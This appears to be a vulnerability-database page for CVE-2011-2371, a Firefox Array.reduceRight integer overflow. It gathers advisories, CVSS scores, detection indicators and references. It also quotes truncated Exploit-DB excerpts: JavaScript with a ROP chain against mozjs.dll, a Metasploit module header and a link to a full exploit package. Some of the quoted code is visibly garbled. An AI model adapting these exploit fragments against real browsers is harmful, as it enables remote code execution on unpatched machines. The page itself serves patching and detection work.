CVE-2011-2371
Published 2011-06-30
CVE-2011-2371: Integer overflow in the Array.reduceRight method in Mozilla Firefox before 3.6.18 and 4.x through 4.0.1, Thunderbird before 3.1.11, and SeaMonkey through…
Priority: P2 (68) · critical · CVSS 2.0: 10
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
Exploit: available
EPSS: 75.69% (99.5th percentile)
Integer overflow in the Array.reduceRight method in Mozilla Firefox before 3.6.18 and 4.x through 4.0.1, Thunderbird before 3.1.11, and SeaMonkey through 2.0.14 allows remote attackers to execute arbitrary code via vectors involving a long JavaScript Array object.
Affected
238 ranges · showing 25 (rows carrying no version data omitted)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mozilla | firefox | <= 3.6.17 | — |
Detection & IOCs (extracted from sources)
Bytes: PrependEncoder `\xbc\x0c\x0c\x0c\x0c`
- Exploit requires a Java-enabled browser; presence of a Java applet alongside Array.reduceRight() JavaScript is a strong indicator of an exploitation attempt.
- Metasploit module fingerprints the User-Agent for Firefox 3.6.16 or 3.6.17 before serving the exploit payload; detection of exploit delivery can key on this UA filter.
- The exploit uses MSVCR71.dll ROP gadgets for DEP/ASLR bypass; presence of MSVCR71.dll ROP chains in memory or shellcode is indicative of this exploit.
- The exploit sets a JavaScript Array length to a large value (0x83000006 observed as signed) to trigger the integer overflow in array_reduceRight; monitor for abnormally large Array length values in JavaScript.
- Trend Micro Deep Security IDS/IPS rule 1004722 detects exploitation of this vulnerability.
- Heap spray targets address 0x0c0c0c0c; memory scanning for repeated 0x0c0c0c0c patterns in browser heap is indicative of this exploit's spray technique.
- The Metasploit module explicitly checks for Firefox 3.6.16 or 3.6.17 User-Agent and returns 404 for other browsers, limiting exploit delivery to those specific versions.
- ROP gadget addresses are hardcoded for MSVCR71.dll on Windows XP/Vista/7; these offsets will not be valid on systems with a different MSVCR71.dll base or version.
- The exploit requires a longer amount of time compared to a typical browser exploit to gain control of the machine.
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C |
| vendor_redhat | — | 10.0 | CRITICAL | — |
| vendor_ubuntu | — | 10.0 | CRITICAL | — |
GHSA
GHSA-2ph2-r6cr-hgrj: Integer overflow in the Array
ghsa_unreviewed·2022-05-17
CVE-2011-2371 [HIGH] GHSA-2ph2-r6cr-hgrj: Integer overflow in the Array
Integer overflow in the Array.reduceRight method in Mozilla Firefox before 3.6.18 and 4.x through 4.0.1, Thunderbird before 3.1.11, and SeaMonkey through 2.0.14 allows remote attackers to execute arbitrary code via vectors involving a long JavaScript Array object.
Ubuntu
Thunderbird vulnerabilities
vendor_ubuntu·2011-07-15·CVSS 10.0
CVE-2011-0083 [CRITICAL] Thunderbird vulnerabilities
Title: Thunderbird vulnerabilities
Summary: Multiple vulnerabilities were fixed in Thunderbird.
Multiple memory vulnerabilities were discovered in the browser rendering
engine. An attacker could use these to possibly execute arbitrary code with
the privileges of the user invoking Thunderbird. (CVE-2011-2364,
CVE-2011-2365, CVE-2011-2374, CVE-2011-2376)
Martin Barbella discovered that under certain conditions, viewing a XUL
document while JavaScript was disabled caused deleted memory to be
accessed. An attacker could potentially use this to crash Thunderbird or
execute arbitrary code with the privileges of the user invoking
Thunderbird. (CVE-2011-2373)
Jordi Chancel discovered a vulnerability on multipart/x-mixed-replace
images due to memory corruption. An attacker could potentially use
Ubuntu
Firefox regression
vendor_ubuntu·2011-06-29·CVSS 10.0
[CRITICAL] Firefox regression
Title: Firefox regression
Summary: In rare instances, Firefox could have trouble accessing some websites.
USN-1149-1 fixed vulnerabilities in Firefox. Unfortunately, a regression
was introduced that prevented cookies from being stored properly when the
hostname was a single character. This update fixes the problem. We
apologize for the inconvenience.
Original advisory details:
Multiple memory vulnerabilities were discovered in the browser rendering
engine. An attacker could use these to possibly execute arbitrary code with
the privileges of the user invoking Firefox. (CVE-2011-2364, CVE-2011-2365,
CVE-2011-2374, CVE-2011-2376)
Martin Barbella discovered that under certain conditions, viewing a XUL
document while JavaScript was disabled caused deleted memory to be
accessed. An attacker
Ubuntu
Firefox regression
vendor_ubuntu·2011-06-23·CVSS 4.3
[MEDIUM] Firefox regression
Title: Firefox regression
Summary: Under certain circumstances, the updated translations could unintentionally
install firefox.
USN-1157-1 fixed vulnerabilities in Firefox. Unfortunately, this update
produced the side effect of pulling in Firefox on some systems that did not
have it installed during a dist-upgrade due to changes in the Ubuntu
language packs. This update fixes the problem. We apologize for the
inconvenience.
Original advisory details:
Bob Clary, Kevin Brosnan, Gary Kwong, Jesse Ruderman, Christian Biesinger,
Bas Schouten, Igor Bukanov, Bill McCloskey, Olli Pettay, Daniel Veditz and
Marcia Knous discovered multiple memory vulnerabilities in the browser
rendering engine. An attacker could possibly execute arbitrary code with
the privileges of the user invoking Firefox. (C
Ubuntu
Firefox and Xulrunner vulnerabilities
vendor_ubuntu·2011-06-22·CVSS 10.0
CVE-2011-2364 [CRITICAL] Firefox and Xulrunner vulnerabilities
Title: Firefox and Xulrunner vulnerabilities
Summary: Multiple Vulnerabilities were fixed in Firefox and Xulrunner
Multiple memory vulnerabilities were discovered in the browser rendering
engine. An attacker could use these to possibly execute arbitrary code with
the privileges of the user invoking Firefox. (CVE-2011-2364, CVE-2011-2365,
CVE-2011-2374, CVE-2011-2376)
Martin Barbella discovered that under certain conditions, viewing a XUL
document while JavaScript was disabled caused deleted memory to be
accessed. An attacker could potentially use this to crash Firefox or
execute arbitrary code with the privileges of the user invoking Firefox.
(CVE-2011-2373)
Jordi Chancel discovered a vulnerability on multipart/x-mixed-replace
images due to memory corruption. An attacker could potentia
Ubuntu
mozvoikko, ubufox, webfav update
vendor_ubuntu·2011-06-22·CVSS 4.3
[MEDIUM] mozvoikko, ubufox, webfav update
Title: mozvoikko, ubufox, webfav update
Summary: This update provides packages compatible with Firefox 5.
USN-1157-1 fixed vulnerabilities in Firefox. This update provides updated
packages for use with Firefox 5.
Original advisory details:
Bob Clary, Kevin Brosnan, Gary Kwong, Jesse Ruderman, Christian Biesinger,
Bas Schouten, Igor Bukanov, Bill McCloskey, Olli Pettay, Daniel Veditz and
Marcia Knous discovered multiple memory vulnerabilities in the browser
rendering engine. An attacker could possibly execute arbitrary code with
the privileges of the user invoking Firefox. (CVE-2011-2374, CVE-2011-2375)
Martin Barbella discovered that under certain conditions, viewing a XUL
document while JavaScript was disabled caused deleted memory to be
accessed. An attacker could potential
Ubuntu
Firefox vulnerabilities
vendor_ubuntu·2011-06-22·CVSS 4.3
CVE-2011-2375 [MEDIUM] Firefox vulnerabilities
Title: Firefox vulnerabilities
Summary: Multiple Firefox vulnerabilities have been fixed
Bob Clary, Kevin Brosnan, Gary Kwong, Jesse Ruderman, Christian Biesinger,
Bas Schouten, Igor Bukanov, Bill McCloskey, Olli Pettay, Daniel Veditz and
Marcia Knous discovered multiple memory vulnerabilities in the browser
rendering engine. An attacker could possibly execute arbitrary code with
the privileges of the user invoking Firefox. (CVE-2011-2374, CVE-2011-2375)
Martin Barbella discovered that under certain conditions, viewing a XUL
document while JavaScript was disabled caused deleted memory to be
accessed. An attacker could potentially use this to crash Firefox or
execute arbitrary code with the privileges of the user invoking Firefox.
(CVE-2011-2373)
Jordi Chancel discovered a vulnerability
Red Hat
Mozilla Integer overflow and arbitrary code execution (MFSA 2011-22)
vendor_redhat·2011-06-21·CVSS 10.0
CVE-2011-2371 [CRITICAL] CWE-190 Mozilla Integer overflow and arbitrary code execution (MFSA 2011-22)
Mozilla Integer overflow and arbitrary code execution (MFSA 2011-22)
Integer overflow in the Array.reduceRight method in Mozilla Firefox before 3.6.18 and 4.x through 4.0.1, Thunderbird before 3.1.11, and SeaMonkey through 2.0.14 allows remote attackers to execute arbitrary code via vectors involving a long JavaScript Array object.
Package: thunderbird (Red Hat Enterprise Linux 6) - Affected
No detection rules found.
Exploit-DB
Mozilla Firefox 4.0.1 - 'Array.reduceRight()' Remote Overflow
exploitdb·2012-02-27·CVSS 10.0
CVE-2011-2371 [CRITICAL] Mozilla Firefox 4.0.1 - 'Array.reduceRight()' Remote Overflow
Mozilla Firefox 4.0.1 - 'Array.reduceRight()' Remote Overflow
---
```javascript
function hex(x){
var y = x.toString(16);
y = "0x"+y;
return y;
}
function itoa(i)
{
return String.fromCharCode(i);
}
// n - length in bytes (1 unicode char = 2 bytes)
function puff(x, n){
while(x.length >16);
return uni;
}
function odd_d2u(d1, d2){
uni = String.fromCharCode((d1&0xFF)>8)&0xFFFF);
uni += String.fromCharCode((d1>>24)+((d2 & 0xFF)>8)&0xFFFF);
uni += String.fromCharCode(d2>>24);
return uni;
}
// generated with mona.py
function rop_chain(mozjs_base){
var arr = [
mozjs_base + 0x000c96e6, // POP EAX // RETN [mozjs.dll]
mozjs_base + 0x0015d054, // ptr to &VirtualAlloc() [IAT mozjs.dll]
mozjs_base + 0x00028510, // MOV EAX,DWORD PTR DS:[EAX] // RETN [mozjs.dll]
mozjs_base + 0x0014293c, // XCHG EAX,ESI // RET
```
Exploit-DB
Mozilla Firefox - 'Array.reduceRight()' Integer Overflow (Metasploit) (2)
exploitdb·2011-10-13
CVE-2011-2371 Mozilla Firefox - 'Array.reduceRight()' Integer Overflow (Metasploit) (2)
Mozilla Firefox - 'Array.reduceRight()' Integer Overflow (Metasploit) (2)
---
```ruby
##
# $Id: mozilla_reduceright.rb 13909 2011-10-13 03:16:15Z sinn3r $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 "Mozilla Firefox Array.reduceRight() Integer Overflow",
'Description' => %q{
This module exploits a vulnerability found in Mozilla Firefox 3.6. When an
array object is configured with a large length value, the reduceRight() method
may cause an invalid index being used, allowing arbitrary remote code execution.
Please note that the exploit requires a l
```
Exploit-DB
Mozilla Firefox - 'Array.reduceRight()' Integer Overflow (1)
exploitdb·2011-10-12·CVSS 10.0
CVE-2011-2371 [CRITICAL] Mozilla Firefox - 'Array.reduceRight()' Integer Overflow (1)
Mozilla Firefox - 'Array.reduceRight()' Integer Overflow (1)
---
# Title: Mozilla Firefox Array.reduceRight() Integer Overflow Exploit
# Date: 12 Oct 2011
# Author: Matteo Memelli ryujin -AT- offensive-security.com
# CVE-2011-2371
# Full exploit package: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17974.zip
Thx to dookie for helping ;)
Vulnerability discovered by Chris Rohlf and Yan Ivnitskiy of Matasano Security
http://www.mozilla.org/security/announce/2011/mfsa2011-22.html
Metasploit
Mozilla Firefox Array.reduceRight() Integer Overflow
metasploit
Mozilla Firefox Array.reduceRight() Integer Overflow
This module exploits a vulnerability found in Mozilla Firefox 3.6. When an array object is configured with a large length value, the reduceRight() method may cause an invalid index being used, allowing arbitrary remote code execution. Please note that the exploit requires a longer amount of time (compare to a typical browser exploit) in order to gain control of the machine.
Trendmicro
Analysis: Firefox Array.reduceRight() Vulnerability
blogs_trendmicro·2011-10-28·CVSS 10.0
[CRITICAL] Analysis: Firefox Array.reduceRight() Vulnerability
## Analysis: Firefox Array.reduceRight() Vulnerability
Get insights and technical analysis on Mozilla.
By: Trend Micro, Oct 28, 2011
The usage of exploits in current threats underlines the critical need for users to keep programs updated at all times. Considering the great amount of time people spend on their computers connected to the Internet, web browsers are prime targets for cybercriminals.
This is a technical analysis of a recently discovered vulnerability in one of the most-used web browsers: Mozilla Firefox.
This Mozilla Firefox vulnerability was discussed by Chris Rohlf and Yan Ivnitskiy during their presentation, Attacking Clientside JIT Compilers, at the Black Hat Conference in Las Vegas earlier this year.
This vulnerability, identified as
Bugzilla
CVE-2011-2371 Mozilla Integer overflow and arbitrary code execution (MFSA 2011-22)
bugzilla·2011-06-20·CVSS 10.0
CVE-2011-2371 [CRITICAL] CVE-2011-2371 Mozilla Integer overflow and arbitrary code execution (MFSA 2011-22)
CVE-2011-2371 Mozilla Integer overflow and arbitrary code execution (MFSA 2011-22)
Security researchers Chris Rohlf and Yan Ivnitskiy of Matasano Security
reported that when a JavaScript Array object had its length set to an
extremely large value, the iteration of array elements that occurs when
its reduceRight method was subsequently called could result in the
execution of attacker controlled memory due to an invalid index value
being used to access element properties.
Discussion:
Public now via:
[1] http://www.mozilla.org/security/announce/2011/mfsa2011-22.html
---
This issue has been addressed in following products:
Red Hat Enterprise Linux 4
Red Hat Enterprise Linux 5
Via RHSA-2011:0887 https://rhn.redhat.com/errata/RHSA-2011-0887.html
---
This issue has been addressed in foll
References
- http://lists.opensuse.org/opensuse-security-announce/2011-07/msg00001.html
- http://secunia.com/advisories/45002
- http://securityreason.com/securityalert/8472
- http://support.avaya.com/css/P8/documents/100144854
- http://support.avaya.com/css/P8/documents/100145333
- http://www.debian.org/security/2011/dsa-2268
- http://www.debian.org/security/2011/dsa-2269
- http://www.debian.org/security/2011/dsa-2273
- http://www.mandriva.com/security/advisories?name=MDVSA-2011:111
- http://www.mozilla.org/security/announce/2011/mfsa2011-22.html
- http://www.redhat.com/support/errata/RHSA-2011-0885.html
- http://www.redhat.com/support/errata/RHSA-2011-0887.html
- http://www.redhat.com/support/errata/RHSA-2011-0888.html
- http://www.ubuntu.com/usn/USN-1149-1
- https://bugzilla.mozilla.org/show_bug.cgi?id=664009
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A13987
Published: 2011-06-30